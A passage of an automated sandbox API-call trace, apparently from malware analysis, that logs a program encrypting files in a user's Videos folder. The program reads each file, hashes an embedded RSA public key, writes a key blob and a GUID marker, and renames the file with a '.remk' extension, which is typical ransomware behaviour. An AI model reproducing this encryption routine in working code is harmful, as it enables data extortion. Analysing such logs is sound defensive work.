Size=0xc) returned 0x31ee910 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8e0 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8c8 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee928 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8c8 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee8c8 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8e0 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee898 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee898 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee898 | out: hHeap=0x630000) returned 1 [0234.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8c8 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8b0 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee868 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c5c0 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.611] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0x1088b, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0x1088b, lpOverlapped=0x0) returned 1 [0234.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.611] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10890, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.611] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.612] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.612] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.612] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.612] CloseHandle (hObject=0x640) returned 1 [0234.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0234.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0234.630] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\kaWqD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\kawqd.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\kaWqD.avi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\kawqd.avi.remk")) returned 1 [0234.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.632] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.633] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a525310, ftCreationTime.dwHighDateTime=0x1d5e457, ftLastAccessTime.dwLowDateTime=0xd8ecadc0, ftLastAccessTime.dwHighDateTime=0x1d5e30c, ftLastWriteTime.dwLowDateTime=0xd8ecadc0, ftLastWriteTime.dwHighDateTime=0x1d5e30c, nFileSizeHigh=0x0, nFileSizeLow=0x1832c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rw 5imJ8K8cEClnKzuF.flv", cAlternateFileName="RW5IMJ~1.FLV")) returned 1 [0234.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.633] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\rw 5imJ8K8cEClnKzuF.flv") returned=".flv" [0234.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\rw 5imJ8K8cEClnKzuF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\rw 5imj8k8ceclnkzuf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.634] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=99116) returned 1 [0234.634] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.637] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18306, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.637] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.648] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.648] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1832c, lpOverlapped=0x0) returned 1 [0234.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.650] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.650] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.651] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.651] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.651] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.651] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.651] GetLastError () returned 0x0 [0234.651] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.651] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.651] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.651] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.651] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18330) returned 0x37c4278 [0234.652] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c5c0 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee868 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c608 [0234.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8b0 [0234.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee910 [0234.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8c8 [0234.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.653] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8b0 | out: hHeap=0x630000) returned 1 [0234.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8c8 | out: hHeap=0x630000) returned 1 [0234.654] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1832c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.654] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.654] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.654] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.654] CloseHandle (hObject=0x640) returned 1 [0234.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x325d3b0 [0234.669] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\rw 5imJ8K8cEClnKzuF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\rw 5imj8k8ceclnkzuf.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\rw 5imJ8K8cEClnKzuF.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\rw 5imj8k8ceclnkzuf.flv.remk")) returned 1 [0234.671] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa145080, ftCreationTime.dwHighDateTime=0x1d5e414, ftLastAccessTime.dwLowDateTime=0xba7619f0, ftLastAccessTime.dwHighDateTime=0x1d5e3dc, ftLastWriteTime.dwLowDateTime=0xba7619f0, ftLastWriteTime.dwHighDateTime=0x1d5e3dc, nFileSizeHigh=0x0, nFileSizeLow=0xa15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uWd 0nDi4nHu_OcIzO.swf", cAlternateFileName="UWD0ND~1.SWF")) returned 1 [0234.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.671] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\uWd 0nDi4nHu_OcIzO.swf") returned=".swf" [0234.672] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\uWd 0nDi4nHu_OcIzO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\uwd 0ndi4nhu_ocizo.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.672] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=2581) returned 1 [0234.672] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.675] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x9ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.675] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.677] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa15, lpOverlapped=0x0) returned 1 [0234.679] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.679] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.679] lstrlenA (lpString="-----BEGIN PUBLIC 